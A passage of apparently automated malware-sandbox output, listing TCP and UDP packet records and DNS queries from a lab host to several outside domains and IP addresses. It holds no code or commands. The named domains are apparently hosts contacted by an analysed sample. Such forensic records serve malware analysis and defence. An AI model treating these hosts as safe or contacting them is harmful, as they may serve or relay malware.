Nov 7, 2024 18:29:50.116235971 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:50.116291046 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:50.116362095 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:50.116913080 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:50.116924047 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:50.731811047 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:50.732049942 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:50.736366987 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:50.736382961 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:50.736685038 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:50.738842964 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:50.783332109 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:51.092930079 CET	443	49173	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:51.093118906 CET	49173	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:51.093486071 CET	49173	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:51.093506098 CET	443	49173	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:51.107927084 CET	49181	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:51.107969046 CET	443	49181	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:51.108139038 CET	49181	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:51.108416080 CET	49181	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:51.108427048 CET	443	49181	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:52.635967016 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.636022091 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.636255026 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.636301994 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.636318922 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:52.636344910 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.636394978 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:52.636599064 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.636646986 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.636769056 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:52.636775970 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.637440920 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.637494087 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:52.637499094 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.753089905 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.753207922 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:52.753236055 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.756340027 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.756373882 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.756392956 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:52.756400108 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.756438971 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.756465912 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:52.756470919 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.756500959 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.756529093 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.756546974 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:52.756552935 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.756593943 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:52.756601095 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.756618023 CET	443	49180	104.21.3.222	192.168.2.22
Nov 7, 2024 18:29:52.756664991 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:52.756958008 CET	49180	443	192.168.2.22	104.21.3.222
Nov 7, 2024 18:29:56.345256090 CET	49182	443	192.168.2.22	207.174.214.153
Nov 7, 2024 18:29:56.345297098 CET	443	49182	207.174.214.153	192.168.2.22
Nov 7, 2024 18:29:56.345361948 CET	49182	443	192.168.2.22	207.174.214.153
Nov 7, 2024 18:29:56.345980883 CET	49182	443	192.168.2.22	207.174.214.153
Nov 7, 2024 18:29:56.345993996 CET	443	49182	207.174.214.153	192.168.2.22
Nov 7, 2024 18:29:57.058106899 CET	443	49182	207.174.214.153	192.168.2.22
Nov 7, 2024 18:29:57.058274031 CET	49182	443	192.168.2.22	207.174.214.153
Nov 7, 2024 18:29:57.071096897 CET	49182	443	192.168.2.22	207.174.214.153
Nov 7, 2024 18:29:57.071124077 CET	443	49182	207.174.214.153	192.168.2.22
Nov 7, 2024 18:29:57.071430922 CET	443	49182	207.174.214.153	192.168.2.22
Nov 7, 2024 18:29:57.073695898 CET	49182	443	192.168.2.22	207.174.214.153
Nov 7, 2024 18:29:57.115331888 CET	443	49182	207.174.214.153	192.168.2.22
Nov 7, 2024 18:29:57.253496885 CET	443	49182	207.174.214.153	192.168.2.22
Nov 7, 2024 18:29:57.253568888 CET	443	49182	207.174.214.153	192.168.2.22
Nov 7, 2024 18:29:57.253632069 CET	49182	443	192.168.2.22	207.174.214.153
Nov 7, 2024 18:29:57.255212069 CET	49182	443	192.168.2.22	207.174.214.153
Nov 7, 2024 18:29:58.559726000 CET	49163	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:29:58.737627983 CET	443	49176	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:58.737703085 CET	49176	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:58.738157988 CET	49176	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:58.738171101 CET	443	49176	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:58.761991978 CET	49183	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:58.762032986 CET	443	49183	195.177.124.30	192.168.2.22
Nov 7, 2024 18:29:58.762092113 CET	49183	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:58.762353897 CET	49183	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:29:58.762367010 CET	443	49183	195.177.124.30	192.168.2.22
Nov 7, 2024 18:30:08.088102102 CET	443	49181	195.177.124.30	192.168.2.22
Nov 7, 2024 18:30:08.088167906 CET	49181	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:30:08.088710070 CET	49181	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:30:08.088727951 CET	443	49181	195.177.124.30	192.168.2.22
Nov 7, 2024 18:30:10.514636040 CET	49184	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:30:10.514691114 CET	443	49184	188.114.96.3	192.168.2.22
Nov 7, 2024 18:30:10.514759064 CET	49184	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:30:10.515381098 CET	49184	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:30:10.515394926 CET	443	49184	188.114.96.3	192.168.2.22
Nov 7, 2024 18:30:11.115812063 CET	443	49184	188.114.96.3	192.168.2.22
Nov 7, 2024 18:30:11.115989923 CET	49184	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:30:11.120698929 CET	49184	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:30:11.120712042 CET	443	49184	188.114.96.3	192.168.2.22
Nov 7, 2024 18:30:11.120954037 CET	443	49184	188.114.96.3	192.168.2.22
Nov 7, 2024 18:30:11.123167038 CET	49184	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:30:11.163341045 CET	443	49184	188.114.96.3	192.168.2.22
Nov 7, 2024 18:30:11.543737888 CET	443	49184	188.114.96.3	192.168.2.22
Nov 7, 2024 18:30:11.543816090 CET	443	49184	188.114.96.3	192.168.2.22
Nov 7, 2024 18:30:11.544023037 CET	49184	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:30:11.544739962 CET	49184	443	192.168.2.22	188.114.96.3
Nov 7, 2024 18:30:11.588735104 CET	49185	443	192.168.2.22	3.33.130.190
Nov 7, 2024 18:30:11.588788033 CET	443	49185	3.33.130.190	192.168.2.22
Nov 7, 2024 18:30:11.588854074 CET	49185	443	192.168.2.22	3.33.130.190
Nov 7, 2024 18:30:11.589453936 CET	49185	443	192.168.2.22	3.33.130.190
Nov 7, 2024 18:30:11.589471102 CET	443	49185	3.33.130.190	192.168.2.22
Nov 7, 2024 18:30:12.269546032 CET	443	49185	3.33.130.190	192.168.2.22
Nov 7, 2024 18:30:12.269726992 CET	49185	443	192.168.2.22	3.33.130.190
Nov 7, 2024 18:30:12.276551962 CET	49185	443	192.168.2.22	3.33.130.190
Nov 7, 2024 18:30:12.276590109 CET	443	49185	3.33.130.190	192.168.2.22
Nov 7, 2024 18:30:12.276947021 CET	443	49185	3.33.130.190	192.168.2.22
Nov 7, 2024 18:30:12.280025959 CET	49185	443	192.168.2.22	3.33.130.190
Nov 7, 2024 18:30:12.327349901 CET	443	49185	3.33.130.190	192.168.2.22
Nov 7, 2024 18:30:12.439126968 CET	443	49185	3.33.130.190	192.168.2.22
Nov 7, 2024 18:30:12.439234972 CET	443	49185	3.33.130.190	192.168.2.22
Nov 7, 2024 18:30:12.439359903 CET	49185	443	192.168.2.22	3.33.130.190
Nov 7, 2024 18:30:12.465574026 CET	49185	443	192.168.2.22	3.33.130.190
Nov 7, 2024 18:30:12.493685961 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:12.493729115 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:12.493787050 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:12.494474888 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:12.494482994 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.192225933 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.192318916 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.196808100 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.196819067 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.197084904 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.199928999 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.247339964 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.477047920 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.477087975 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.477134943 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.477159977 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.477181911 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.477190971 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.477222919 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.487639904 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.929939032 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.929953098 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.930002928 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.930021048 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.930032969 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.930064917 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.930084944 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.930098057 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.933147907 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.933182001 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.933212996 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.933218002 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.933273077 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.936321020 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.936343908 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.936374903 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.936379910 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.936392069 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.936459064 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.936510086 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.936516047 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.936531067 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.936599016 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.936604977 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.939919949 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.941243887 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.941263914 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.941307068 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.941312075 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:13.941320896 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.976793051 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:13.985744953 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:14.057673931 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:14.057734966 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:14.057770967 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:14.057790995 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:14.057831049 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:14.058398962 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:14.058446884 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:14.058453083 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:14.119982958 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:14.120039940 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:14.120068073 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:14.120099068 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:14.120143890 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:14.173393011 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:14.173403025 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:14.173474073 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:14.173490047 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:14.173511982 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:14.173553944 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:14.177409887 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:14.287729979 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:14.287786007 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:14.287812948 CET	443	49186	63.250.43.9	192.168.2.22
Nov 7, 2024 18:30:14.287841082 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:14.287873030 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:14.295772076 CET	49186	443	192.168.2.22	63.250.43.9
Nov 7, 2024 18:30:14.329874039 CET	49168	80	192.168.2.22	217.160.0.236
Nov 7, 2024 18:30:15.762047052 CET	443	49183	195.177.124.30	192.168.2.22
Nov 7, 2024 18:30:15.762104988 CET	49183	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:30:15.762547970 CET	49183	443	192.168.2.22	195.177.124.30
Nov 7, 2024 18:30:15.762559891 CET	443	49183	195.177.124.30	192.168.2.22
Nov 7, 2024 18:30:15.804348946 CET	49172	80	192.168.2.22	217.160.0.236

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2024 18:29:04.826014996 CET	54562	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:04.839075089 CET	53	54562	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:05.986577988 CET	52917	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:06.198122025 CET	53	52917	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:06.223198891 CET	62751	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:06.232584953 CET	53	62751	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:08.323040962 CET	57893	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:08.377962112 CET	53	57893	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:08.380601883 CET	54821	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:08.433595896 CET	53	54821	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:09.994679928 CET	54719	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:10.018379927 CET	53	54719	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:11.701998949 CET	49881	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:11.708785057 CET	53	49881	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:27.126560926 CET	54998	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:27.133934021 CET	53	54998	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:28.172045946 CET	52781	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:28.382675886 CET	53	52781	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:28.385337114 CET	52781	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:28.595443964 CET	53	52781	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:28.595604897 CET	52781	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:28.701553106 CET	63926	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:28.780065060 CET	53	63926	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:28.780222893 CET	63926	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:28.787233114 CET	53	63926	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:28.805258989 CET	53	52781	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:28.805823088 CET	52781	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:29.015408993 CET	53	52781	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:29.246788979 CET	52781	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:29.458070040 CET	53	52781	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:29.922857046 CET	65510	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:29.930105925 CET	53	65510	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:31.748282909 CET	62672	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:32.016133070 CET	53	62672	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:32.016379118 CET	62672	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:32.023503065 CET	53	62672	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:32.100451946 CET	56475	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:32.153675079 CET	53	56475	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:32.371484041 CET	56475	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:32.405009031 CET	53	56475	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:33.688838005 CET	49384	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:33.695925951 CET	53	49384	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:34.067126036 CET	54842	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:34.074378967 CET	53	54842	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:34.729985952 CET	58105	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:34.939785957 CET	53	58105	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:34.941843033 CET	58105	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:35.151832104 CET	53	58105	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:35.152707100 CET	58105	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:35.362596989 CET	53	58105	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:35.380004883 CET	58105	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:35.790424109 CET	53	58105	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:35.790607929 CET	58105	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:36.000390053 CET	53	58105	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:36.014728069 CET	137	137	192.168.2.22	192.168.2.255
Nov 7, 2024 18:29:36.776262045 CET	137	137	192.168.2.22	192.168.2.255
Nov 7, 2024 18:29:37.540731907 CET	137	137	192.168.2.22	192.168.2.255
Nov 7, 2024 18:29:38.328353882 CET	64928	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:38.335644007 CET	53	64928	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:38.338058949 CET	57390	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:38.345038891 CET	53	57390	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:39.979077101 CET	58095	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:40.000323057 CET	53	58095	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:41.703156948 CET	54261	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:41.736790895 CET	53	54261	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:41.737442970 CET	54261	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:41.744425058 CET	53	54261	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:45.808527946 CET	60507	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:45.829363108 CET	53	60507	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:45.830219030 CET	137	137	192.168.2.22	192.168.2.255
Nov 7, 2024 18:29:46.588706017 CET	137	137	192.168.2.22	192.168.2.255
Nov 7, 2024 18:29:47.353075027 CET	137	137	192.168.2.22	192.168.2.255
Nov 7, 2024 18:29:48.136537075 CET	50446	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:48.149023056 CET	53	50446	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:49.209939957 CET	55939	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:49.218424082 CET	53	55939	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:50.070765018 CET	49608	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:50.082551956 CET	53	49608	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:50.104423046 CET	61486	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:50.115724087 CET	53	61486	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:51.098553896 CET	62453	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:51.106733084 CET	53	62453	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:52.777345896 CET	50568	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:52.995450020 CET	53	50568	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:52.995913982 CET	50568	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:53.213871002 CET	53	50568	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:53.215004921 CET	50568	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:53.432868004 CET	53	50568	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:53.433043003 CET	50568	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:53.645711899 CET	53	50568	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:53.645944118 CET	50568	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:53.872998953 CET	53	50568	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:53.874533892 CET	137	137	192.168.2.22	192.168.2.255
Nov 7, 2024 18:29:54.638302088 CET	137	137	192.168.2.22	192.168.2.255
Nov 7, 2024 18:29:55.402751923 CET	137	137	192.168.2.22	192.168.2.255
Nov 7, 2024 18:29:56.191560030 CET	61467	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:56.337310076 CET	53	61467	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:56.337716103 CET	61467	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:56.344647884 CET	53	61467	8.8.8.8	192.168.2.22
Nov 7, 2024 18:29:58.751494884 CET	61618	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:29:58.761651993 CET	53	61618	8.8.8.8	192.168.2.22
Nov 7, 2024 18:30:08.136657953 CET	54422	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:30:08.172323942 CET	53	54422	8.8.8.8	192.168.2.22
Nov 7, 2024 18:30:08.172435999 CET	54422	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:30:08.179842949 CET	53	54422	8.8.8.8	192.168.2.22
Nov 7, 2024 18:30:08.180617094 CET	137	137	192.168.2.22	192.168.2.255
Nov 7, 2024 18:30:08.943613052 CET	137	137	192.168.2.22	192.168.2.255
Nov 7, 2024 18:30:09.707926989 CET	137	137	192.168.2.22	192.168.2.255
Nov 7, 2024 18:30:10.503354073 CET	52074	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:30:10.514089108 CET	53	52074	8.8.8.8	192.168.2.22
Nov 7, 2024 18:30:11.568897963 CET	50337	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:30:11.588120937 CET	53	50337	8.8.8.8	192.168.2.22
Nov 7, 2024 18:30:12.485466957 CET	61826	53	192.168.2.22	8.8.8.8
Nov 7, 2024 18:30:12.492995024 CET	53	61826	8.8.8.8	192.168.2.22
Nov 7, 2024 18:30:53.048010111 CET	138	138	192.168.2.22	192.168.2.255

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 7, 2024 18:29:04.826014996 CET	192.168.2.22	8.8.8.8	0x88bf	Standard query (0)	actividades.laforetlanguages.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:05.986577988 CET	192.168.2.22	8.8.8.8	0xa543	Standard query (0)	sbcopylive.com.br	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:06.223198891 CET	192.168.2.22	8.8.8.8	0x998d	Standard query (0)	trasix.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:08.323040962 CET	192.168.2.22	8.8.8.8	0xde1e	Standard query (0)	www.parkinsons.co.in	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:08.380601883 CET	192.168.2.22	8.8.8.8	0x2332	Standard query (0)	www.parkinsons.co.in	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:09.994679928 CET	192.168.2.22	8.8.8.8	0xbc81	Standard query (0)	parkinsons.co.in	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:11.701998949 CET	192.168.2.22	8.8.8.8	0xc2e6	Standard query (0)	biz.merlin.ua	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:27.126560926 CET	192.168.2.22	8.8.8.8	0x91d8	Standard query (0)	actividades.laforetlanguages.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:28.172045946 CET	192.168.2.22	8.8.8.8	0xa1c9	Standard query (0)	sbcopylive.com.br	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:28.385337114 CET	192.168.2.22	8.8.8.8	0xa1c9	Standard query (0)	sbcopylive.com.br	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:28.595604897 CET	192.168.2.22	8.8.8.8	0xa1c9	Standard query (0)	sbcopylive.com.br	A (IP address)	IN (0x0001)	false
Nov 7, 2024 18:29:28.701553106 CET	192.168.2.22	8.8.8.8	0xc396	Standard query (0)	biz.merlin.ua	A (IP address)	IN (0x0001)	false
